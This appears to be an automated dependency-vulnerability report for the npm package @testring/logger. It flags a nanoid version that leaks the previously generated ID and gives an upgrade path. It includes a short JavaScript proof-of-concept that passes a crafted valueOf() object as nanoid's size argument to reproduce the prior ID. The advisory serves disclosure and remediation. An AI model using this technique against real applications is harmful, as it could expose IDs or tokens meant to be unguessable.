Vulnerabilities: 1 via 3 paths

Dependencies: 21

Source: npm


medium severity
new

Information Exposure

  • Vulnerable module: nanoid
  • Introduced through: @testring/utils@0.5.36 and @testring/transport@0.5.36

Detailed paths

  • Introduced through: @testring/logger@0.5.36 › @testring/utils@0.5.36 › nanoid@3.1.12
  • Introduced through: @testring/logger@0.5.36 › @testring/transport@0.5.36 › @testring/utils@0.5.36 › nanoid@3.1.12
  • Introduced through: @testring/logger@0.5.36 › @testring/transport@0.5.36 › @testring/child-process@0.5.36 › @testring/utils@0.5.36 › nanoid@3.1.12

Overview

Affected versions of this package are vulnerable to Information Exposure via the valueOf() function, which allows the last generated ID to be reproduced.

PoC

import { nanoid } from 'nanoid';

const makeProxyNumberToReproducePreviousID = () => {
  let step = 0;
  return {
    valueOf() {
      // if (!pool || pool.length < bytes) {
      if (step === 0) {
        step++;
        return 0;
      }

      // } else if (poolOffset + bytes > pool.length) {
      if (step === 1) {
        step++;
        return -Infinity;
      }

      // poolOffset += bytes
      if (step === 2) {
        step++;
        return 0;
      }

      return 21;
    },
  };
};

const ID1 = nanoid();
const ID2 = nanoid(makeProxyNumberToReproducePreviousID());
console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 });

Remediation

Upgrade nanoid to version 3.1.31 or higher.
